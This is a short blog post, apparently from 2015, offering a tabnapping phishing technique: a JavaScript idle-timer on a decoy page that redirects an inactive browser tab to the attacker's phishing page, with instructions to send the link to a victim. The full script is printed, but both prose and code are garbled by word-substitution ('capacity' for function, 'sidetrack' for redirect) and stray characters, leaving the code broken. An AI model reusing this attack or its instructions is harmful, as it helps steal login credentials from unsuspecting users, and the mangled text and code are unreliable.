Pages

Subscribe:

Tuesday 6 October 2015

Advance Phising (Tabnapping)

Make a site page and utilize the tab snoozing script in that page say it page A. This script won't influence the format or substance of the page. This script will check for client activities. On the off chance that the page is unmoving for quite a while, this script will divert this page to a pre-determined page which may be your phishing page. You need to determine this page in the script. Make certain to change this in script.

check script for this line...

timerRedirect = setInterval("location.href='http://www.gmail.com'",10000);

this line will divert to Gmail after 10 sec. Change this area to the location of your phishing page. This line is utilized 2 times as a part of the script so change in both lines.

thus, page A with tab snoozing script will divert to phishing page B.

Presently send the page's connection A to your casualty. This is a typical page. On the off chance that the page is unmoving for quite a while it will be changed to page B generally no impact.

Hacking web and PC tips and traps

<script type="text/javascript">

var xScroll, yScroll, timerPoll, timerRedirect, timerClock;

capacity initRedirect(){

on the off chance that (typeof document.body.scrollTop != "undefined"){/IE,NS7,Moz

xScroll = document.body.scrollLeft;

yScroll = document.body.scrollTop;

clearInterval(timerPoll);/quit surveying parchment move

clearInterval(timerRedirect);/stop timed sidetrack

timerPoll = setInterval("pollActivity()",1?);/survey looking over

timerRedirect = setInterval("location.href='http://www.gmail.com'",10000);/set timed sidetrack

}

else if (typeof window.pageYOffset != "undefined"){/different programs that backing pageYOffset/pageXOffset

xScroll = window.pageXOffset;

yScroll = window.pageYOffset;

clearInterval(timerPoll);/quit surveying parchment move

clearInterval(timerRedirect);/stop timed sidetrack

timerPoll = setInterval("pollActivity()",1?);/survey looking over

timerRedirect = setInterval("location.href='http://www.gmail.com'",10000);/set timed sidetrack

}

/else do nothing

}

capacity pollActivity(){

on the off chance that ((typeof document.body.scrollTop != "vague" && (xScroll!=document.body.scroll?Left || yScroll!=document.body.scrollT?op))/IE/NS7/Moz

||

(typeof window.pageYOffset != "indistinct" && (xScroll!=window.pageXOffset || yScroll!=window.pageYOffset)))? {/different programs

initRedirect();/reset surveying parchment position

}

}

document.onmousemove=initRedir?ect;

document.onclick=initRedirect;

document.onkeydown=initRedirec?t;

window.onload=initRedirect;

window.onresize=initRedirect;

</script>

Note:You need to duplicate a source code and glue it into two seperate notepadd++ tab

the first for the tabnapping, so you will put the script here with the goal that it will divert to the second one which is really your phishing page...

Posted by Mirza Hassan at 00:00

0 comments:

Post a Comment